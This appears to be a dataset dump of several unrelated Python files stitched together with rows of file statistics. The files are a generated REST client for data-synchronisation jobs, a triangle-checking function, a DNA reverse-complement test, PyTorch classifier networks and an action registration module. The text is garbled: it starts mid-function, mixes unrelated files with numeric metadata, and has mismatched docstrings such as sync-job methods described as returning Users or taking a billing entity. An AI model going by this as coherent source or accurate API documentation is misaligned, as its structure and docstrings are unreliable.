kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_sync_job_with_http_info(synch_job, **kwargs)
else:
(data) = self.create_sync_job_with_http_info(synch_job, **kwargs)
return data
def create_sync_job_with_http_info(self, synch_job, **kwargs):
"""
Create a synch job.
{\"nickname\":\"Create a new sync job\",\"request\":\"createSynchJobRequest.html\",\"response\":\"createSynchJobResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_sync_job_with_http_info(synch_job, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MutableBillingEntity synch_job: The data synch job object to be created. (required)
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['synch_job']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_sync_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'synch_job' is set
if ('synch_job' not in params) or (params['synch_job'] is None):
raise ValueError("Missing the required parameter `synch_job` when calling `create_sync_job`")
resource_path = '/synchJobs'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'synch_job' in params:
body_params = params['synch_job']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_sync_jobs(self, **kwargs):
"""
Returns a collection of Users. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get all synch jobs\",\"response\":\"getSynchJobsAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_sync_jobs(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first synch job to return.
:param int records: The maximum number of synch jobs to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_sync_jobs_with_http_info(**kwargs)
else:
(data) = self.get_all_sync_jobs_with_http_info(**kwargs)
return data
def get_all_sync_jobs_with_http_info(self, **kwargs):
"""
Returns a collection of Users. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get all synch jobs\",\"response\":\"getSynchJobsAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_sync_jobs_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first synch job to return.
:param int records: The maximum number of synch jobs to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizations', 'offset', 'records', 'order_by', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_sync_jobs" % key
)
params[key] = val
del params['kwargs']
resource_path = '/synchJobs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_id(self, synch_job_id, **kwargs):
"""
Returns a single job, specified by the ID parameter.
{\"nickname\":\"Retrieve an existing synch job\",\"response\":\"getSyncJobByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_id(synch_job_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str synch_job_id: ID of the Sync Job. (required)
:param list[str] organizations: A list of organization -IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sync_job_by_id_with_http_info(synch_job_id, **kwargs)
else:
(data) = self.get_sync_job_by_id_with_http_info(synch_job_id, **kwargs)
return data
def get_sync_job_by_id_with_http_info(self, synch_job_id, **kwargs):
"""
Returns a single job, specified by the ID parameter.
{\"nickname\":\"Retrieve an existing synch job\",\"response\":\"getSyncJobByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_id_with_http_info(synch_job_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str synch_job_id: ID of the Sync Job. (required)
:param list[str] organizations: A list of organization -IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['synch_job_id', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sync_job_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'synch_job_id' is set
if ('synch_job_id' not in params) or (params['synch_job_id'] is None):
raise ValueError("Missing the required parameter `synch_job_id` when calling `get_sync_job_by_id`")
resource_path = '/synchJobs/{synchJob-ID}'.replace('{format}', 'json')
path_params = {}
if 'synch_job_id' in params:
path_params['synchJob-ID'] = params['synch_job_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_scope(self, scope, **kwargs):
"""
Returns a collection jobs, specified by the scope parameter.
{\"nickname\":\"Retrieve by scope\",\"response\":\"getSyncJobByScope.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_scope(scope, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str scope: The scope of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sync_job_by_scope_with_http_info(scope, **kwargs)
else:
(data) = self.get_sync_job_by_scope_with_http_info(scope, **kwargs)
return data
def get_sync_job_by_scope_with_http_info(self, scope, **kwargs):
"""
Returns a collection jobs, specified by the scope parameter.
{\"nickname\":\"Retrieve by scope\",\"response\":\"getSyncJobByScope.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_scope_with_http_info(scope, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str scope: The scope of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['scope', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sync_job_by_scope" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'scope' is set
if ('scope' not in params) or (params['scope'] is None):
raise ValueError("Missing the required parameter `scope` when calling `get_sync_job_by_scope`")
resource_path = '/synchJobs/scope/{scope}'.replace('{format}', 'json')
path_params = {}
if 'scope' in params:
path_params['scope'] = params['scope']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_state(self, state, **kwargs):
"""
Returns a collection jobs, specified by the state parameter.
{\"nickname\":\"Retrieve by state\",\"response\":\"getSyncJobByState.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_state(state, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str state: The state of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sync_job_by_state_with_http_info(state, **kwargs)
else:
(data) = self.get_sync_job_by_state_with_http_info(state, **kwargs)
return data
def get_sync_job_by_state_with_http_info(self, state, **kwargs):
"""
Returns a collection jobs, specified by the state parameter.
{\"nickname\":\"Retrieve by state\",\"response\":\"getSyncJobByState.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_state_with_http_info(state, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str state: The state of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['state', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sync_job_by_state" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'state' is set
if ('state' not in params) or (params['state'] is None):
raise ValueError("Missing the required parameter `state` when calling `get_sync_job_by_state`")
resource_path = '/synchJobs/state/{state}'.replace('{format}', 'json')
path_params = {}
if 'state' in params:
path_params['state'] = params['state']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_target(self, target, **kwargs):
"""
Returns a collection jobs, specified by the target parameter.
{\"nickname\":\"Retrieve by target\",\"response\":\"getSyncJobByTarget.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_target(target, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str target: The target of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sync_job_by_target_with_http_info(target, **kwargs)
else:
(data) = self.get_sync_job_by_target_with_http_info(target, **kwargs)
return data
def get_sync_job_by_target_with_http_info(self, target, **kwargs):
"""
Returns a collection jobs, specified by the target parameter.
{\"nickname\":\"Retrieve by target\",\"response\":\"getSyncJobByTarget.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_target_with_http_info(target, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str target: The target of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['target', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sync_job_by_target" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'target' is set
if ('target' not in params) or (params['target'] is None):
raise ValueError("Missing the required parameter `target` when calling `get_sync_job_by_target`")
resource_path = '/synchJobs/target/{target}'.replace('{format}', 'json')
path_params = {}
if 'target' in params:
path_params['target'] = params['target']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_sync_job_by_type(self, type, **kwargs):
"""
Returns a collection jobs, specified by the type parameter.
{\"nickname\":\"Retrieve by type\",\"response\":\"getSyncJobByType.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_type(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: The type of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sync_job_by_type_with_http_info(type, **kwargs)
else:
(data) = self.get_sync_job_by_type_with_http_info(type, **kwargs)
return data
def get_sync_job_by_type_with_http_info(self, type, **kwargs):
"""
Returns a collection jobs, specified by the type parameter.
{\"nickname\":\"Retrieve by type\",\"response\":\"getSyncJobByType.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sync_job_by_type_with_http_info(type, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str type: The type of the synch job. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sync_job_by_type" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'type' is set
if ('type' not in params) or (params['type'] is None):
raise ValueError("Missing the required parameter `type` when calling `get_sync_job_by_type`")
resource_path = '/synchJobs/type/{type}'.replace('{format}', 'json')
path_params = {}
if 'type' in params:
path_params['type'] = params['type']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def update_sync_job(self, synch_job, **kwargs):
"""
Update a synch job.
{\"nickname\":\"Update a synch job\",\"request\":\"updateSyncJobRequest.html\",\"response\":\"updateSyncJobResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_sync_job(synch_job, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MutableBillingEntity synch_job: The synch job object to be updated. (required)
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_sync_job_with_http_info(synch_job, **kwargs)
else:
(data) = self.update_sync_job_with_http_info(synch_job, **kwargs)
return data
def update_sync_job_with_http_info(self, synch_job, **kwargs):
"""
Update a synch job.
{\"nickname\":\"Update a synch job\",\"request\":\"updateSyncJobRequest.html\",\"response\":\"updateSyncJobResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_sync_job_with_http_info(synch_job, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param MutableBillingEntity synch_job: The synch job object to be updated. (required)
:return: DataSynchronizationJobPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['synch_job']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_sync_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'synch_job' is set
if ('synch_job' not in params) or (params['synch_job'] is None):
raise ValueError("Missing the required parameter `synch_job` when calling `update_sync_job`")
resource_path = '/synchJobs'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'synch_job' in params:
body_params = params['synch_job']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DataSynchronizationJobPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 43.157034
| 136
| 0.582817
| 4,173
| 39,575
| 5.317757
| 0.059909
| 0.057681
| 0.018025
| 0.02163
| 0.927854
| 0.916002
| 0.901942
| 0.894236
| 0.874454
| 0.867649
| 0
| 0.000529
| 0.331371
| 39,575
| 916
| 137
| 43.204148
| 0.838101
| 0.385951
| 0
| 0.747642
| 1
| 0
| 0.167173
| 0.049867
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040094
| false
| 0
| 0.016509
| 0
| 0.115566
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c192141d46e6c38640c54bee3d0da46bd8b6f655
| 498
|
py
|
Python
|
Session-2/Conditions/S2C2.py
|
saianuragpeddu/python-assignemts
|
a6bb192f2c0ef8ea86531c1a98f1b76150fa474b
|
[
"MIT"
] | null | null | null |
Session-2/Conditions/S2C2.py
|
saianuragpeddu/python-assignemts
|
a6bb192f2c0ef8ea86531c1a98f1b76150fa474b
|
[
"MIT"
] | null | null | null |
Session-2/Conditions/S2C2.py
|
saianuragpeddu/python-assignemts
|
a6bb192f2c0ef8ea86531c1a98f1b76150fa474b
|
[
"MIT"
] | 1
|
2019-07-06T02:37:58.000Z
|
2019-07-06T02:37:58.000Z
|
def isIsosceles(x, y, z):
if x <= 0 or y <=0 or z <=0:
return False
if x == y:
return True
if y == z:
return True
if x == z:
return True
else:
return False
print(isIsosceles(-2, -2, 3))
print(isIsosceles(2, 3, 2))
def isIsosceles(x, y, z):
if x <= 0 or y <=0 or z <=0:
return False
elif x == y or y == z or x == z:
return True
else:
return False
print(isIsosceles(-2, -2, 3))
print(isIsosceles(2, 3, 2))
| 18.444444
| 36
| 0.506024
| 84
| 498
| 3
| 0.190476
| 0.031746
| 0.269841
| 0.126984
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0.833333
| 0
| 0.055901
| 0.353414
| 498
| 26
| 37
| 19.153846
| 0.726708
| 0
| 0
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.454545
| 0.181818
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c1b8aae057f65bb8fc5b422483ca4fcf66bbb362
| 249
|
py
|
Python
|
tcrdist/tests/test_translation.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 26
|
2020-12-28T17:37:01.000Z
|
2022-01-29T01:31:13.000Z
|
tcrdist/tests/test_translation.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 31
|
2020-08-17T22:17:57.000Z
|
2022-03-18T23:47:34.000Z
|
tcrdist/tests/test_translation.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 7
|
2020-08-18T23:55:40.000Z
|
2021-09-22T18:15:54.000Z
|
import pytest
"""
Unit Tests for translation.py
"""
def test_reverse_compliment():
from tcrdist.translation import reverse_complement
assert reverse_complement(seq = 'ATGC') == 'GCAT'
assert reverse_complement(seq = 'AT.GC') == 'GC.AT'
| 24.9
| 55
| 0.718876
| 31
| 249
| 5.612903
| 0.645161
| 0.293103
| 0.264368
| 0.298851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156627
| 249
| 9
| 56
| 27.666667
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0.085308
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.2
| true
| 0
| 0.4
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1be93dfe72dc16a8f17f075e9c7c80a454fceeb
| 1,841
|
py
|
Python
|
classification/torch_codes/net.py
|
sansastra/uncertainty_edl_graph
|
21c20bef323b520f6031ca54c2eb1fd020841f9d
|
[
"Apache-2.0"
] | 4
|
2021-08-09T20:46:22.000Z
|
2022-03-23T15:58:30.000Z
|
classification/torch_codes/net.py
|
sansastra/uncertainty_edl_graph
|
21c20bef323b520f6031ca54c2eb1fd020841f9d
|
[
"Apache-2.0"
] | null | null | null |
classification/torch_codes/net.py
|
sansastra/uncertainty_edl_graph
|
21c20bef323b520f6031ca54c2eb1fd020841f9d
|
[
"Apache-2.0"
] | 1
|
2021-11-02T14:29:51.000Z
|
2021-11-02T14:29:51.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
class Net_30(nn.Module):
def __init__(self, dropout=False, input_size=60, hidden_layer_size=128, output_size=2):
super().__init__()
self.fc1 = nn.Linear(input_size,hidden_layer_size)
self.use_dropout = dropout
self.fc2 = nn.Linear(hidden_layer_size, hidden_layer_size)
self.use_dropout = dropout
self.fc3 = nn.Linear(hidden_layer_size, hidden_layer_size//2)
self.use_dropout = dropout
self.fc4 = nn.Linear(hidden_layer_size//2, output_size)
def forward(self, x):
x = F.relu(self.fc1(x))
if self.use_dropout:
x = F.dropout(x, training=self.training)
x = F.relu(self.fc2(x))
if self.use_dropout:
x = F.dropout(x, training=self.training)
x = F.relu(self.fc3(x))
if self.use_dropout:
x = F.dropout(x, training=self.training)
# x = torch.sigmoid(self.fc4(x))
x = torch.relu(self.fc4(x))
return x
class Net_OOS(nn.Module):
def __init__(self, dropout=False, input_size=60*4, hidden_layer_size=128, output_size=2):
super().__init__()
self.fc1 = nn.Linear(input_size,hidden_layer_size)
self.use_dropout = dropout
self.fc3 = nn.Linear(hidden_layer_size, hidden_layer_size//2)
self.use_dropout = dropout
self.fc4 = nn.Linear(hidden_layer_size//2, output_size)
def forward(self, x):
x = F.relu(self.fc1(x))
if self.use_dropout:
x = F.dropout(x, training=self.training)
x = F.relu(self.fc3(x))
if self.use_dropout:
x = F.dropout(x, training=self.training)
# x = torch.sigmoid(self.fc4(x))
x = torch.relu(self.fc4(x))
return x
| 33.472727
| 93
| 0.625747
| 273
| 1,841
| 4
| 0.153846
| 0.120879
| 0.164835
| 0.086996
| 0.895604
| 0.895604
| 0.895604
| 0.895604
| 0.878205
| 0.878205
| 0
| 0.025473
| 0.253666
| 1,841
| 54
| 94
| 34.092593
| 0.769287
| 0.033134
| 0
| 0.767442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.093023
| false
| 0
| 0.093023
| 0
| 0.27907
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e718c5b220de94891b388894e795174435b6c09e
| 267
|
py
|
Python
|
openslides_backend/action/committee/__init__.py
|
reiterl/openslides-backend
|
d36667f00087ae8baf25853d4cef18a5e6dc7b3b
|
[
"MIT"
] | null | null | null |
openslides_backend/action/committee/__init__.py
|
reiterl/openslides-backend
|
d36667f00087ae8baf25853d4cef18a5e6dc7b3b
|
[
"MIT"
] | null | null | null |
openslides_backend/action/committee/__init__.py
|
reiterl/openslides-backend
|
d36667f00087ae8baf25853d4cef18a5e6dc7b3b
|
[
"MIT"
] | null | null | null |
from ..base import DummyAction
from ..register import register_action
from . import create # noqa
@register_action("committee.update")
class CommitteeUpdate(DummyAction):
pass
@register_action("committee.delete")
class CommitteeDelete(DummyAction):
pass
| 19.071429
| 38
| 0.779026
| 29
| 267
| 7.068966
| 0.517241
| 0.204878
| 0.22439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131086
| 267
| 13
| 39
| 20.538462
| 0.883621
| 0.014981
| 0
| 0.222222
| 0
| 0
| 0.122605
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.222222
| 0.333333
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
